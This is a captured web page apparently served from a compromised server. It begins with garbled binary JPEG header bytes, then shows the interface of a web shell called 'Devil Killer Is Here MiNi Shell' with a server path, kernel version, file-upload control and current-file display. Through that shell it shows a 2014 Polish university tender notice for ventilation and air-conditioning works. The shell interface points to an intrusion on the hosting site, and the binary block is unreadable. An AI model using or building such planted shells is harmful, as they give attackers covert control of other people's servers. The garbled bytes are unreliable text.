JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141017/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141017/221119-N-2014.html

<p class="kh_header"><b>Wrocław: Wykonanie wentylacji mechanicznej i klimatyzacji sali ćwiczeń Zakładu Parazytologii w budynku A-3 przy ul. C. K. Norwida 31 we Wrocławiu. Sprawa RAP.272.105.2014</b><br>
<b>Numer ogłoszenia: 221119 - 2014; data zamieszczenia: 17.10.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet Przyrodniczy we Wrocławiu , ul. C.K. Norwida 25, 50-375 Wrocław, woj. dolnośląskie, tel. 71 3205020, faks 71 3205386.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.up.wroc.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie wentylacji mechanicznej i klimatyzacji sali ćwiczeń Zakładu Parazytologii w budynku A-3 przy ul. C. K. Norwida 31 we Wrocławiu. Sprawa RAP.272.105.2014.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wykonanie wentylacji mechanicznej i klimatyzacji sali ćwiczeń Zakładu Parazytologii Uniwersytetu Przyrodniczego we Wrocławiu, w budynku A-3 przy ul. C. K. Norwida 31 we Wrocławiu

Inwestycja ma na celu zapewnienie komfortu cieplnego oraz normatywnej wymiany powietrza w sali ćwiczeń Zakładu Parazytologii w budynku A-3 Uniwersytetu Przyrodniczego we Wrocławiu przy ul. C. K. Norwida 31 we Wrocławiu, poprzez wykonanie wentylacji mechanicznej nawiewno-wywiewnej oraz instalacji chłodzenia.

Instalacja wentylacyjna będzie oparta na centrali wentylacyjnej podwieszanej nawiewno - wywiewnej z krzyżowym wymiennikiem ciepła. Należy zastosować dwie nagrzewnice kanałowe elektryczne oraz, na instalacji nawiewnej jak i wywiewnej w obrębie korytarza, prostokątne kulisowe tłumiki akustyczne. Nawiew i wywiew z pomieszczeń sali ćwiczeń oraz korytarza będzie realizowany poprzez kratki 
wentylacyjne osadzone na kanale okrągłym z podwójnym rzędem kierownic. 

Instalacja chłodzenia - klimatyzacji zostanie wykonana z zastosowaniem klimatyzatora typu multisplit, tj. jednostka zewnętrzna oraz dwie jednostki wewnętrzne ścienne wraz z instalacją freonową z rur miedzianych i odprowadzeniem skroplin.

Przy realizacji prac instalacyjnych, należy wykonać roboty budowlane towarzyszące - otwory pod kanały wentylacyjne i przewody instalacyjne wraz z obmurowaniem i otynkowaniem przegród budowlanych..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa w 
art. 67 ust. 1 pkt. 6 ustawy Pzp w całym zakresie zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.33.12.10-1, 45.33.12.20-4, 45.33.12.30-7, 45.11.13.00-1, 45.31.11.00-1, 45.31.12.00-0, 45.31.22.00-9, 45.31.43.10-7, 45.31.50.00-8, 45.31.70.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.02.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium w niniejszym postępowaniu</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby 
przedmiotowego zamówienia nie 
wymaga posiadania specjalnych uprawnień, Zamawiający nie ustanawia 
szczegółowych warunków udziału w tym zakresie. Wykonawca musi złożyć 
oświadczenie o spełnieniu warunków udziału w postępowaniu stanowiące 
załącznik nr 2 do SIW
Z. Zamawiający uzna warunek za spełniony, gdy 
przedłożony dokument będzie zgodny z wymogami SIWZ. Zamawiający oceni 
spełnienie warunku udziału w postępowaniu na podstawie oświadczenia 
załączonego do oferty na zasadzie spełnia 
-
nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże 
wykonanie w okresie ostatnich pięciu lat przed upływem terminu składania 
ofert, a jeżeli okres prowadzenia działalności je
st krótszy -w tym okresie, co 
najmniej dwóch  robót  budowlanych: jednej instalacyjnej-wentylacyjnej o wartości nie mniejszej niż 40 000 zł brutto oraz jednej klimatyzacyjnej również o wartości nie mniejszej niż 40 000 zł brutto,  oraz przedstawi dokumenty 
potwierdzające, że
roboty te zostały wykonane zgodnie z zasadami sztuki 
budowlanej i prawidłowo ukończone. Dowodami o których mowa powyżej są: 
1) poświadczenie, z tym że w odniesieniu do nadal wykonywanych dostaw lub 
usług okresowych lub ciągłych poświadczenie powinno być wydane nie 
wcześniej niż na 3 miesiące przed upływem terminu składania ofert, 2) w 
przypadku zamówień na dostawy 
-
oświadczenie wykonawcy 
-
jeżeli z 
uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w 
stanie uzyskać poświadczenia, o którym
mowa powyżej, 3) w przypadku 
zamówień na roboty budowlane 
-
inne dokumenty 
-
jeżeli z uzasadnionych 
4
przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać 
poświadczenia o którym mowa powyżej UWAGA! Jeżeli załączony wykaz 
wykonanych usług będzie potwierdzać wartość tych dostaw w walucie innej 
niż PLN, Wykonawca powinien dokonać przeliczenia na PLN według 
średniego kursu NBP z dnia, w którym niniejsze ogłoszenie o zamówieniu 
zostało opublikowane w Biuletynie Zamówień Publicznych. W przypadku 
gdy w przedstawionym wykazie wskazane zostaną przez Wykonawcę wartości w 
walucie innej niż PLN, Zamawiający dokona przeliczenia na PLN według 
kursu średniego NBP z dnia, w którym ogłoszenie o zamówieniu zostało 
opublikowane w Biuletynie Zamówień Publicznych. Zgodnie z art. 26 ust. 2b 
ustawy Pzp Wykonawca może polegać na wiedzy i doświadczeniu, potencjale 
technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach 
finansowych innych podmiotów, niezależnie od charakteru prawnego 
łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany 
jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi 
do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne 
(w oryginale) zobowiązanie tych podmiotów do oddania mu 
do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu 
zamówienia. Dokumenty te Wykonawcy składający ofertę wspólnie składają 
wspólnie. Treść zobowiązania podmiotu trzeciego powinna określać: kto jest 
podmiotem przyjmującym zasoby, za
kres zobowiązania podmiotu trzeciego, 
czego konkretnie dotyczy zobowiązanie oraz w jaki sposób będzie ono 
wykonane, w tym jakiego okresu dotyczy. A w sytuacji, gdy przedmiotem 
udzielenia są zasoby nierozerwalnie związane z podmiotem ich udzielającym, 
niemo
żliwe do samodzielnego obrotu i dalszego udzielenia ich bez 
zaangażowania tego podmiotu w wykonanie zamówienia, taki dokument 
powinien zawierać wyraźne nawiązanie do uczestnictwa tego podmiotu w 
wykonaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie ustanawia szczegółowych warunków udziału w tym zakresie. 
Wykonawca musi złożyć oświadczenie o spełnieniu warunków udziału w 
postępowaniu stanowiące załącznik nr 2 do SIWZ. Zamawiający uzna warun
ek 
za spełniony, gdy przedłożony dokument będzie zgodny z wymogami SIWZ. 
Zamawiający oceni spełnienie warunku udziału w postępowaniu na podstawie 
oświadczenia załączonego do oferty na zasadzie spełnia 
-
nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykaże dysponuje 
lub będzie dysponował osobami (wykaz osób 
-
stanowiący załącznik nr 4 do 
SIWZ), posiadającymi kwalifikacje zawodowe, doświad
czenie i uprawnienia 
w rozumieniu ustawy Prawo budowlane z dnia 7 lipca 1994 r. (tekst jednolity 
Dz.U.z 2006 r. Nr 156 poz. 1118 z późn. zm.) czy odpowiednio wcześniej 
wydanych przepisów lub uprawnieniami zagranicznymi, uznawanymi na 
terytorium Rzeczpospolitej Polskiej zgodnie z art. 12a Prawa budowlanego, tj. 
ustawa o zasadach uznawania kwalifikacji zawodowych nabytych w 
5
państwach członkowskich Unii Europejskiej z dnia 18.03.2008r., na 
stanowisku: 
-	kierownika robót sanitarnych posiadającego uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej, oraz złoży oświadczenie, że w/w osoba posiada odpowiednie uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień załącznik nr 4a do SIWZ
-	kierownika robót elektrycznych posiadającego uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacji elektrycznej, oraz złoży oświadczenie, że w/w osoba posiada odpowiednie uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień załącznik nr 4a do SIWZ

(wg. Załącznika nr 4a do SIWZ).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie ustanawia szczegółowych warunków udziału w tym zakresie. 
Wykonawca musi złożyć oświadczenie o spełnieniu warunków udziału w 
postępowaniu stanowiące załącznik nr 2 do SIWZ. Zamawiający uzna warunek 
za spełniony, gdy przedłożony doku
ment będzie zgodny z wymogami SIWZ. 
Zamawiający oceni spełnienie warunku udziału w postępowaniu na podstawie 
oświadczenia załączonego do oferty na zasadzie spełnia 
-
nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)
Wypełniony i podpisany formularz ofertowy zał. nr 1 do SIWZ, kosztorys ofertowy, 
sporządzony wg zał. nr 6 sposób obliczenia ceny ofertowej, oraz na podstawie przedmiarów 
robót załączniki nr 7 i 7a, STWiOR załączniki nr 8 i 8a oraz dokumentacji 
projektowej. 
Zgodnie z art. 26 ust. 2b ustawy Pzp wykonawca może polegać na wiedzy i 
doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub 
zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących 
go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić 
zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w 
szczególności przedstawiając w tym celu pisemne (w oryginale) zobowiązanie tych 
podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich 
przy wykonaniu zamówienia. Dokumenty te Wykonawcy składający ofertę wspólnie składają 
wspólnie. Treść zobowiązania podmiotu trzeciego powinna określać: kto jest podmiotem 
przyjmującym zasoby, zakres zobowiązania podmiotu trzeciego, czego konkretnie dotyczy 
zobowiązanie oraz w jaki sposób będzie ono wykonane, w tym jakiego okresu dotyczy. A w 
sytuacji, gdy przedmiotem udzielenia są zasoby nierozerwalnie związane z podmiotem ich 
udzielającym, niemożliwe do samodzielnego obrotu i dalszego udzielenia ich bez 
zaangażowania tego podmiotu w wykonanie zamówienia, taki dokument powinien zawierać 
wyraźne nawiązanie do uczestnictwa tego podmiotu w wykonaniu zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Na podst. art. 144 ustawy Pzp Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia: 
1)	Zmiana terminu realizacji przedmiotu umowy: 
a.	zmiany spowodowane warunkami geologicznymi, terenowymi, archeologicznymi, wodnymi itp., w szczególności: 
- istotnie odmienne od przyjętych w dokumentacji projektowej warunki geologiczne (kategorie gruntu, skał, itp.),
- istotnie odmienne od przyjętych w dokumentacji projektowej warunki terenowe, w szczególności istnienie podziemnych urządzeń, instalacji lub obiektów infrastrukturalnych, 
         b. zmiany będące następstwem okoliczności leżących po stronie Zamawiającego, w szczególności: 
- wstrzymanie realizacji umowy przez Zamawiającego, 
- konieczność usunięcia błędów lub wprowadzenia zmian w dokumentacji projektowej załączonej do SIWZ, 
- zmiana dokumentacji projektowej dostarczonej przez Zamawiającego, 
c. zmiany będące następstwem działania organów administracji, w szczególności: 
- przekroczenie zakreślonych przez prawo terminów wydawania przez organy administracji decyzji, zezwoleń, itp., 
- wydanie postanowienia o wstrzymaniu robót budowlanych z przyczyn innych niż zawinione przez Wykonawcę w przypadku, o którym mowa w art. 50 ust. 1 pkt. 4 Prawa budowlanego, 
- konieczność uzyskania wyroku sądowego, lub innego orzeczenia sądu lub organu, którego konieczności nie przewidywano przy zawieraniu umowy. 
W przypadku wystąpienia którejkolwiek z okoliczności wymienionych pkt. 1 termin wykonania umowy może ulec odpowiedniemu przedłużeniu, o czas niezbędny do zakończenia wykonywania jej przedmiotu w sposób należyty, nie dłużej jednak niż o okres trwania tych okoliczności. Każda taka zmiana wprowadzona będzie w trybach i procedurach opisanych         w umowie. 
2)	Zmiany technologiczne, mogące skutkować również zmianą wynagrodzenia Wykonawcy, w szczególności: 
a)	pojawienie się na rynku części, materiałów lub urządzeń nowszej generacji niż opisane     w SIWZ, pozwalających na zmniejszenie kosztów realizacji umowy lub kosztów eksploatacji wykonanego Obiektu; 
b)	pojawienie się nowszej technologii wykonania robót pozwalającej na zaoszczędzenie czasu realizacji umowy lub jego kosztów, jak również kosztów eksploatacji wykonanego Obiektu; 
c)	konieczność zrealizowania zakresu technicznego Obiektu przy zastosowaniu innych rozwiązań technicznych/technologicznych niż wskazane w SIWZ w sytuacji, gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem Robót, 
d)	odmienne od przyjętych w dokumentacji projektowej warunki gruntowe (kategorie gruntu, kurzawka, itp.) lub istnienie nie zinwentaryzowanych (nie ujętych                        w dokumentacji) urządzeń, instalacji lub obiektów, skutkujące niemożliwością zrealizowania przedmiotu Umowy przy dotychczasowych założeniach technologicznych; 
e)	konieczność zrealizowania Robót przy zastosowaniu innych rozwiązań technicznych lub materiałowych ze względu na zmiany obowiązującego prawa. 
3)	 Pozostałe zmiany 
a)	siła wyższa uniemożliwiająca wykonanie umowy zgodnie z SIWZ, 
b)	rezygnacja przez Zamawiającego z realizacji części Robót. W takim przypadku wynagrodzenie przysługujące Wykonawcy zostanie obniżone, przy czym Zamawiający zapłaci za wszystkie spełnione świadczenia oraz udokumentowane koszty, które Wykonawca poniósł w związku z wynikającymi z umowy planowanymi świadczeniami, według umowy
c)	kolizja z planowanymi lub równolegle prowadzonymi przez inne podmioty inwestycjami. W takim przypadku zmiany w umowie zostaną ograniczone do zmian koniecznych powodujących uniknięcie kolizji lub usunięcia powstałej już kolizji,
d)	konieczność przedłużenia terminu realizacji zamówienia  w przypadku zaistnienia okoliczności niezależnych od stron, których nie można było przewidzieć w chwili zawierania umowy, zwłaszcza w przypadku wystąpienia potrzeby realizacji robót dodatkowych, 
e)	Zmiany wynagrodzenia Wykonawcy spowodowane zmianą stawki VAT, 
f)	Zmiana sposobu, warunków lub terminów płatności określonych w umowie w przypadku zmiany zasad finansowania inwestycji przez Zamawiającego skutkującej koniecznością lub możliwością dokonania przedmiotowych zmian w umowie. 
g)	Wprowadzenie podwykonawcy (w sytuacji, gdy wykonawca w ofercie zadeklarował realizację siłami własnymi) za wyraźną zgodą Zamawiającego oraz na warunkach określonych w siwz oraz wzorze umowy dotyczących podwykonawstwa.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.up.wroc.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Biuro 
Zamówień Publicznych i Umów Uniwersytetu Przyrodniczego we Wrocławiu, ul. C.K. 
Norwida 25, 50
-
375 Wrocław, pok. 32.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.10.2014 godzina 11:30, miejsce: Sekret
ariat Kanclerza Uniwersytetu 
Przyrodniczego we Wrocławiu, ul. C. K. Norwida 25, 50
-
375 Wrocław pok. 142, I piętro.
10.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Wymagania związane ze złożeniem oferty wspólnej
W przypadku złożenia oferty wspólnej przez kilku Wykonawców działających w formie spółki cywilnej, lub konsorcjum należy przedstawić w ofercie pełnomocnictwo ustanawiające pełnomocnika do reprezentowania Wykonawców/wspólników w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i  zawarcia  umowy  w  sprawie  zamówienia  publicznego.  Pełnomocnictwo  musi  być  wystawione  w  formie, o której mowa w rozdziale V pkt. 7.

W złożonej ofercie wspólnej przez kilka podmiotów każdy z nich zobowiązany jest przedstawić dokumenty wystawione na niego wymienione w rozdziale V punkt 9.5, 9.6 i 9.7.
Dokumenty określone w rozdziale V SIWZ w punktach 9.1, 9.2, 9.3, 9.4, 9.8, 9.9 i 9.10  poszczególne podmioty składają wspólnie, tj. warunki w nich określone zostaną spełnione, gdy podmioty składające wspólną ofertę spełnią je łącznie. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia - wypełniając formularz ofertowy jak również inne dokumenty powołujące się na wykonawcę w miejscu nazwa i adres wykonawcy - muszą wpisać dane dotyczące wykonawców występujących wspólnie a nie pełnomocnika.

